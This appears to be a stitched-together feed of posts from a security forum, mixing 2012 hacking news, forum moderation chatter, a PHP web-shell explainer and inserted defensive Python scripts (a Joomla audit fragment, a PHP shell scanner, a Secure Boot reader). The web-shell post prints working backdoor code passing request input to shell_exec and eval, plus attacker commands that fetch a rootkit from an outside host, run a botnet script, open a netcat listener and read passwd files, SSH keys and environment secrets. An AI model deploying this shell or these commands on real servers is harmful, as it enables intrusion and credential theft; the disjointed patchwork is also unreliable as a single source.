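        defines = "define('JPATH_CONFIGURATION', JPATH_ROOT.DS.'../wubi');\n"
        config_path = os.path.join(base, 'wubi', 'configuration.php')
    else:
        put('public_html/htaccess.txt', 'IndexIgnore *\n')
        put('public_html/installation/index.php', '<?php // installer left behind\n')
        put('public_html/configuration.php', "<?php\nclass JConfig {\n  var $dbprefix = 'jos_';\n}\n")
        defines, config_path = "define('JPATH_CONFIGURATION', JPATH_ROOT);\n", None
    for rel in DEFINES_FILES:
        put('public_html/' + rel, defines)
    return os.path.join(base, 'public_html'), config_path


if __name__ == '__main__':
    for hardened in (False, True):
        webroot, cfg = make_sample_tree(hardened)
        print('hardened' if hardened else 'default install', '->', audit(webroot, cfg) or 'all steps applied')
```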
-
It doesn't matter whether you did something or not. If your presence is useless and your first post looks like this, then you can't help but agree with him. Your presence on the forum is useless. Which is why a moderator or administrator can boot you out of here without leaving any trace of your existence. Access to this forum is a privilege, by no means a right. Nobody cares that you got banned on an account with 2 useless posts. If you don't like it, file a complaint against that moderator. Or make another account, write some quality posts and leave the mockery aside. This isn't Revolution Square, where you protest to demand your rights. Here you first have to earn the right to have rights!
-
Probably never. Ever since '98, when SQL injection was first mentioned. So it seems that in 14 years not much has been learned.
-
Android Forums hacked, User Credentials Stolen

Phandroid's Android Forums website has been hacked and user account details stolen, according to a notice posted online. The data includes the user names, e-mail addresses, hashed passwords, and registration IP addresses of the forums' more than 1 million users. If you are one of them, you should change your password: go to your UserCP or use the "Forgot your password?" function. Furthermore, if you use the same e-mail address and password combination elsewhere, you should change it there as well.

"I have some unfortunate news to pass along," the post reads. "Yesterday I was informed by our server/developer team that the server hosting Androidforums.com was compromised and the website's database was accessed. While the breach is most likely harmless, there are important and potential pitfalls, and we want to provide as much helpful information to our users as possible (without getting too technical)."

Phandroid will continue to investigate what happened. The exploit used has been identified and resolved. All code that resides in the database and the file system has been thoroughly reviewed for malicious edits and uploads. Recently, the social Q&A website Formspring said that it was the victim of a hack that yielded hashed passwords for around 420,000 of its users. Yahoo warned users of its Yahoo Voice service of a breach in which 400,000 plaintext passwords were stolen from the company and posted online. http://thehackernews.com/2012/07/android-forums-hacked-user-credentials.html
-
Cross-platform Trojan : Mac, Windows, Linux - Nothing safe !
Wubi posted a topic in Stiri securitate

Security researchers working for F-Secure have found a web exploit that detects the operating system of the computer and drops a different trojan to match. The attack was first seen on a Colombian transport website which had been hacked by a third party. This malware is known as GetShell.A and requires users to approve a Java applet installation. It detects if you're running Windows, Mac OS X, or Linux, and then downloads the corresponding malware for your platform. The malicious files developed for each type of OS connect to the same Command & Control server, which F-Secure has located at IP address 186.87.69.249. Karmina Aquino, a senior analyst with F-Secure, said "All three files for the three different platforms behave the same way. They all connect to 186.87.69.249 to get additional code to execute. The ports are 8080, 8081, and 8082 for OSX, Linux and Windows, respectively."

On the upcoming 29th July 2012, security researchers Sina Hatef Matbue and Arash Shirkhorshidi are going to present "Graviton Malware", which is cross-platform malware, at 'The Hackers Conference 2012'. The purpose of 'graviton' is to become an artificial creature which can move between the world of Windows, the world of Apples, and the world of the empire penguins, etc. and remain stealthy. The Windows one sends the following information back to the remote attacker: CPU details, disk details, memory usage, OS version, and user name. The Trojan can also download a file and execute it, or open a shell to receive commands. 'Graviton' is a combination of pure 'C' and 'asm'.

The Hackers Conference 2012 is expected to be the first open gathering of Blackhat hackers in India who will debate the latest security issues with the top intelligence echelons in India. The conference has sent special invites to Blackhat hackers to come and demonstrate their talent and help the security agencies bridge the knowledge gaps existing today. You can register yourself here, to attend THC2012. http://thehackernews.com/2012/07/cross-platform-trojan-mac-windows-linux.html
-
Indian Officials Get Training from Hackers who cracked CERN's IT system

Two Argentina-based cyber security experts, Chris Russo and Fernando Viacanel, who claimed to have cracked the security of IT systems involved in the discovery of the 'God Particle', today conducted training sessions for Indian government officials. Both hackers are partners in the IT security firm E2 Labs, and their company, in arrangement with the industry chamber Assocham, has plans to conduct a series of technology exchange programmes on cyber security. Russo said that three times he has been able to find vulnerabilities in the IT systems of the European Organisation for Nuclear Research (CERN), which has been involved in the discovery of the 'God Particle' or Higgs boson. The programme was attended by officials from the Cabinet Secretariat, the National Technical Research Organisation, the Air Force, C-DAC, the Income Tax Department and Assam's AMTRON, along with representatives from private sector entities Aircel and Cisco. "The talents required to be cyber security experts are mostly available in people with an average age of below 30. This should also be recognised by the government", Senior Director of Assocham Ajay Sharma said.

Chris Russo is also going to present "Black Arts of Automated and Remote Exploitation" at The Hackers Conference, which will be held in New Delhi on July 29, 2012. His talk will be about bundle exploit packs, also known as BEPs. His presentation shows and demonstrates the mechanisms, including passive and active detection systems, drive-by download and drive-by cache techniques, the geolocation libraries implemented, obfuscation and encryption techniques, and the on-the-fly selection of the most convenient exploit for each case: how these systems are used for malware spreading such as botnets, PPI binaries and rogue AVs, generating profits for their owners of more than $500 daily.

The audience should benefit by understanding the threats, risks and market behind the automated remote exploitation techniques and the entire economic system behind it. His talk will also allow users to take preventive measures in order to stop these threats or reduce the risk associated with them. The Hackers Conference 2012 is expected to be the first open gathering of Blackhat hackers in India who will debate the latest security issues with the top intelligence echelons in India. The conference has sent special invites to Blackhat hackers to come and demonstrate their talent and help the security agencies bridge the knowledge gaps existing today. You can register yourself here, to attend THC2012. http://thehackernews.com/2012/07/indian-officials-get-training-from.html
-
A backdoor shell is a file, which can be PHP, ASP, JSP, PLM, PNL, PDL. The last three are rarer. I'll give you an example, maybe you'll understand better; below is a piece of code that will let you, as the attacker, run *nix commands:
<?php
if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
if(isset($_GET['echo'])) echo($_GET['echo']);
?>
Now let's assume we saved it as HTML.php and uploaded it to a Linux web server. We'll need to append ?shell= at the end to run commands such as:
cat /etc/passwd
wget www.slo.boz.com/rootkit.pl
cat /var/www/config.inc
find / -name netcat
ifconfig | grep eth0
perl botnet.pl
nc -lvp 1336
ls -la
ps aux | grep root
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat /proc/self/environ
find / -perm -1000 -type d 2>/dev/null
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
ruby -v
gcc -v
perl -v
python -v
But in the 21st century we have shells with a user interface, which makes them easier to use. Take c99, r57, etc. for example. Many shells have functions like email bomber, back-connect, file downloader or uploader, MySQL dumper, run SQL statements, web fuzzer, port scanner and so on. I hope you've understood what backdoor shells are and how they work.
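From the defender's side, the snippet above has a very recognisable shape: request input ($_GET, $_POST, ...) flowing straight into shell_exec()/eval(), or eval() wrapping a decoder such as base64_decode(). The scanner below is an added example (not code from the post or from any shell kit) that flags those two patterns in PHP source; the PHP samples it scans are constructed inline, and the first one reproduces the shell from the post so you can see what a hit looks like.

```python
"""Flag PHP files that hand request input to a command or code-execution sink.

Added example for web-server hardening: a first-pass triage tool, not a
substitute for a real static analyser or an integrity baseline of the docroot.
"""
import os
import re
from typing import List, Tuple

# Functions that pass a string to the OS or to the PHP interpreter.
DANGEROUS_SINKS = ("shell_exec", "exec", "system", "passthru", "popen",
                   "proc_open", "eval", "assert")
# Decoders that obfuscated shells typically wrap in eval()/assert().
DECODERS = ("base64_decode", "gzinflate", "gzuncompress", "str_rot13")
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"

# A sink whose argument list (up to the end of the statement) mentions a
# request superglobal, e.g. shell_exec($_GET['shell']) or eval(stripcslashes($_GET['php'])).
SINK_WITH_INPUT = re.compile(
    r"\b(" + "|".join(DANGEROUS_SINKS) + r")\s*\(([^;]*?)" + SUPERGLOBAL,
    re.IGNORECASE,
)
# eval()/assert() directly around a decoder call, the classic packed-shell signature.
SINK_WITH_DECODER = re.compile(
    r"\b(eval|assert)\s*\(\s*(" + "|".join(DECODERS) + r")\s*\(",
    re.IGNORECASE,
)

Finding = Tuple[int, str, str]  # (line number, sink name, reason)


def scan_php_source(source: str) -> List[Finding]:
    """Return one finding per source line that matches either pattern."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = SINK_WITH_INPUT.search(line)
        if m:
            findings.append((lineno, m.group(1).lower(), "request input reaches sink"))
            continue
        m = SINK_WITH_DECODER.search(line)
        if m:
            findings.append((lineno, m.group(1).lower(),
                             f"decoder {m.group(2).lower()}() inside code-execution sink"))
    return findings


def scan_tree(root: str) -> List[Tuple[str, Finding]]:
    """Walk a docroot and scan every .php file (errors on unreadable files are skipped)."""
    hits: List[Tuple[str, Finding]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    for finding in scan_php_source(fh.read()):
                        hits.append((path, finding))
            except OSError:
                pass
    return hits


# Constructed samples. The first reproduces the shell from the post above.
SUSPECT_PHP = """<?php
if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>");
if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
if(isset($_GET['echo'])) echo($_GET['echo']);
?>"""

# Constructed packed-shell shape; the payload is just base64("phpinfo();").
OBFUSCATED_PHP = "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>"

# Constructed benign page: request input is used, but only reaches htmlspecialchars/echo.
BENIGN_PHP = """<?php
$q = htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES);
echo "<p>Results for $q</p>";
?>"""

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PHP), ("obfuscated", OBFUSCATED_PHP), ("benign", BENIGN_PHP)):
        print(label, scan_php_source(src))
```

Note that line 4 of the sample (echo($_GET['echo'])) is not reported: it is a reflected-output problem, not command or code execution, and a scanner for shells should stay focused on the sinks that actually run something. Pair a tool like this with a file-integrity baseline of the document root, since a regex scanner can only ever catch the shapes it knows.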
-
Plesk Zero Day Exploit in the Wild, Thousands of sites got Hacked Sucuri Malware Labs reports that some zero-day exploits are available to hackers and are being used to hack into Parallels' Plesk Panel (port number 8443). These attacks have kept rising over the last few months, as you can see in the graph: At least 4000 new websites were infected each day, according to Sucuri malware researcher Daniel Cid. On other news portals there was news recently that some 50,000 websites have been compromised as part of a sustained iframe injection attack campaign. Security analysts found that the majority of the sites being targeted are running Plesk Panel version 10.4.4 or older versions. Brian Krebs on his blog reports that hackers in the criminal underground are selling an exploit that extracts the master password needed to control Parallels' Plesk Panel. This zero-day exploit for Plesk is being sold on the black market for around $8,000 per purchase. Many of the queries probed for the web hosting software Plesk, a finding backed by the SANS Internet Storm Center, which noted a sharp uptick in requests over port 8443, used by Plesk. It's unclear whether this claimed exploit is related to a rash of recent attacks against Plesk installations. Last month, malware researcher Denis Sinegubko had provided analysis of the BlackHole Exploit Kit's successful compromise of several sampled websites, and had determined that a vulnerability in Plesk was probably the culprit. http://thehackernews.com/2012/07/plesk-zero-day-exploit-in-wild.html
-
4XP Critical SQL Injection Vulnerability Exposed The zSecure team has recently discovered a critical SQL injection vulnerability in the web portal of 4XP, a leading online forex broker with a customer base of more than 1 lakh. Financial transactions are carried out on the broker's platform on a daily basis, including but not limited to credit card transactions. The critical vulnerability allows complete access to the broker's database, which can be misused to access their customers' confidential information including login IDs, passwords, home addresses, email IDs, mobile numbers, credit card details, etc. This critical vulnerability could prove devastating to the company if they don't fix it ASAP. Below are the details about the company and the discovered vulnerability.
About the Company
4XP is an online forex broker that specializes in providing an all-inclusive trading package backed by a caring and devoted support team. 4XP was founded by a group of retail-ended entrepreneurs and capital market dealers sharing a vision for creating a customer-oriented brokerage service that would provide a compelling trading solution. 4XP strives toward creating the most professional and transparent trading environment possible.
Vulnerability details
Website: www.4xp.com
Vulnerability Type: Hidden SQL Injection Vulnerability
Database Type: MySQL
Alert Level: Critical
Threats: Complete Database Access, Database Dump, Shell Uploading
Worst case scenarios
Any malicious smart black hats can create much more devastating attacks using this critical flaw, such as: uninterrupted access to the database; database dump; possibility of shell uploading, which may result in defacement of the website; and much more . . .
Proof of vulnerability
http://www.zsecure.net/blog/vulnerabilities/4xp-sql-injection-vulnerability.html http://thehackernews.com/2012/07/4xp-critical-sql-injection.html
-
NO BOOT FOR YOU ! Will Windows 8 Kill Live CDs and USBs? In January 2012, Microsoft confirmed to PC manufacturers that they must enable Secure Boot by default on PCs to be “Certified for Windows 8”. The purpose of Secure Boot is to put an end to computer viruses that sneak between the hardware and the operating system. These viruses, also known as bootkits, work by getting themselves loaded before the operating system, then they make changes to the operating system while it lies defenseless on disk, and then they load the now defenseless operating system and have their way with it. Secure Boot counters the bootkit by ensuring the hardware verifies the identity and authenticity of the software that sits between the hardware and the operating system - the bootloader, and also the software embedded in hardware devices like network and graphics adapters. Secure Boot sounds like a smart solution to the bootkit problem, doesn’t it? Who wouldn’t want a secure boot? Proponents of alternative operating systems don’t want Secure Boot; not in its current form anyway. Since Microsoft’s pronouncement, anger has been widespread within Linux communities that Secure Boot on PCs Certified for Windows 8 will lock out alternative operating systems, e.g. all Linux distributions. The problem boils down to the way Microsoft and PC manufacturers will implement Secure Boot, and how difficult it will be for many, if not all, alternative operating systems to follow suit. Microsoft's stance has been "not our problem", and in the everyone-for-themselves sense, they're right. Will Secure Boot’s implementation also mean that bootable removable media (rescue disks, Live CDs, Live USBs, Live OSs) will also no longer boot? Live CDs and Live USBs provide an “out-of-band” security and management capability that is as relevant to Secure Boot systems as their predecessors. 
The practice of cleaning an infected device from an independent, external, known clean device is recommended by government cyber security departments (United States Computer Emergency Readiness Team, Canada's Cyber Incident Response Centre, Australian Government's cybersecurity website) and computer security leaders (Krebs, Viega, Rubenking) around the world. A Live OS running several anti-virus scanners is effective at detecting and removing rootkits and bootkits, as well as other types of malware that are not going to be slowed down by Secure Boot. Indeed, with a Live OS, it’s the bootkit that lies defenseless on disk while the Live OS has its way with it. Based on what’s knowable of the Secure Boot implementation on PCs to be Certified for Windows 8 (these don't exist yet for confirming anyone's understanding), external devices containing a Live OS are not going to boot via UEFI’s Secure Boot process. There won’t be a certificate for the Live OS's bootloader in the Secure Boot table of bootloader certificates. Is Secure Boot in exchange for no more Live OS a smart security tradeoff? Enter the Windows 8 Windows Recovery Environment (RE). In a recent “Building Windows 8" blog post, Microsoft program manager Chris Clark details the new capabilities in Windows 8 RE. One of the new capabilities enables the end-user, with the click of the mouse, to tell the Windows bootloader to boot an external device. This feature of Windows RE will make booting a Live OS on an external device easier than it's ever been for end-users. End-users will no longer have to hit a manufacturer specific function key in less than ~2 seconds on startup in order to access and then modify their BIOS\UEFI settings. This is a great development for Live OS on external bootable media, and great news for Linux distributions looking to lower the barrier to entry and capture new users, e.g. 
Ubuntu's Live OS will now be bootable without requiring the user to fiddle with their computer's BIOS\UEFI, which is at least as difficult as fiddling with the Secure Boot on/off setting will be. The question remaining is - will this new and easy way to boot an external device mean more users than ever will try an alternative operating system on PCs that are otherwise locked to Windows 8? About the Author: Marty Algire is a founder of FixMeStick, makers of the FixMeStick virus removal device that literally anyone can use. He was a founding team member of the pioneering Internet privacy company Zero-Knowledge and Vice-President of Products and Engineering at Radialpoint, a provider of consumer security solutions to the world’s largest ISPs. He has a B.Sc. and M.Sc. in Biosystems Engineering from McGill University. http://thehackernews.com/2012/07/no-boot-for-you-will-windows-8-kill.html
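Whether or not a Live OS gets past the firmware, a rescue tool running on Linux can at least tell what state Secure Boot is in on the machine it landed on, because the firmware publishes it as UEFI variables. The script below is an added example, not part of the article or of any vendor's tooling; it reads the SecureBoot and SetupMode variables through efivarfs (/sys/firmware/efi/efivars, where each file is 4 bytes of attribute flags followed by the variable data, and both variables carry one data byte). The sample byte strings at the bottom are constructed to show what a firmware would expose.

```python
"""Report UEFI Secure Boot state from a Linux Live OS or rescue environment.

Added example. Reads the EFI_GLOBAL_VARIABLE-scoped SecureBoot and SetupMode
variables via efivarfs; on a legacy-BIOS boot the directory does not exist,
which itself answers the question (nothing is being enforced).
"""
import os
from typing import Optional

EFI_GLOBAL_VARIABLE_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS_DIR = "/sys/firmware/efi/efivars"


def efivar_bool(raw: bytes) -> bool:
    """Decode a one-byte boolean EFI variable as efivarfs presents it.

    Layout: 4 bytes of little-endian attribute flags (BS|RT = 0x00000006 for
    these two variables), then the single data byte.
    """
    if len(raw) != 5:
        raise ValueError(f"expected 4 attribute bytes + 1 data byte, got {len(raw)}")
    return raw[4] != 0


def classify(secure_boot: Optional[bool], setup_mode: Optional[bool]) -> str:
    """Turn the two firmware flags into one verdict a rescue tool can act on."""
    if secure_boot is None:
        # No EFI variables visible: legacy BIOS boot, or efivarfs not mounted.
        return "not-uefi"
    if setup_mode:
        # Setup mode: the platform key is cleared, so no signature is enforced
        # regardless of what the SecureBoot byte says.
        return "setup-mode"
    return "enforcing" if secure_boot else "disabled"


def read_efivar(name: str, directory: str = EFIVARS_DIR) -> Optional[bytes]:
    """Return the raw efivarfs file for a global variable, or None if absent."""
    path = os.path.join(directory, f"{name}-{EFI_GLOBAL_VARIABLE_GUID}")
    try:
        with open(path, "rb") as fh:
            return fh.read()
    except OSError:
        return None


def secure_boot_status(directory: str = EFIVARS_DIR) -> str:
    """Combine the live variables into a verdict; missing files degrade gracefully."""
    sb_raw = read_efivar("SecureBoot", directory)
    sm_raw = read_efivar("SetupMode", directory)
    sb = efivar_bool(sb_raw) if sb_raw is not None else None
    sm = efivar_bool(sm_raw) if sm_raw is not None else None
    return classify(sb, sm)


# Constructed sample file contents (attributes BS|RT, then the data byte):
# (SecureBoot, SetupMode) pairs for an enforcing machine and one left in setup mode.
SAMPLE_ENFORCING = (b"\x06\x00\x00\x00\x01", b"\x06\x00\x00\x00\x00")
SAMPLE_SETUP_MODE = (b"\x06\x00\x00\x00\x00", b"\x06\x00\x00\x00\x01")


def classify_sample(sample) -> str:
    """Classify a constructed (SecureBoot, SetupMode) pair of raw variable files."""
    return classify(efivar_bool(sample[0]), efivar_bool(sample[1]))


if __name__ == "__main__":
    print("this machine:", secure_boot_status())
    print("sample enforcing:", classify_sample(SAMPLE_ENFORCING))
    print("sample setup mode:", classify_sample(SAMPLE_SETUP_MODE))
```

The setup-mode case matters for the article's tradeoff: a machine that reports SecureBoot=0 may simply have the feature switched off, or may have had its platform key cleared so that a user (or anyone with firmware access) can enrol new keys, and a rescue tool should report those two situations differently.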
-
What exactly is this supposed to be?
-
The Activity Stream filter doesn't work and these aren't shown; More Activity doesn't seem to work either. It would be interesting to put Activity Stream in place of the old "What's New?", like on vB 4.2. You get used to it easily. Plus it's easier to get a rough idea of everything being discussed on the forum at that moment. Another suggestion: put the chat in the navbar.
-
The best and most dangerous hacker in the world!
Wubi replied to H4ck3rPr4fz0rrr.'s topic in Cosul de gunoi
That kid is going to be marked for life by TinKode. He's the "Wannabe" version of him. -
#Suggestion: the GameTime Green theme from PureVB. Without all that Facebook, Twitter, YouTube junk.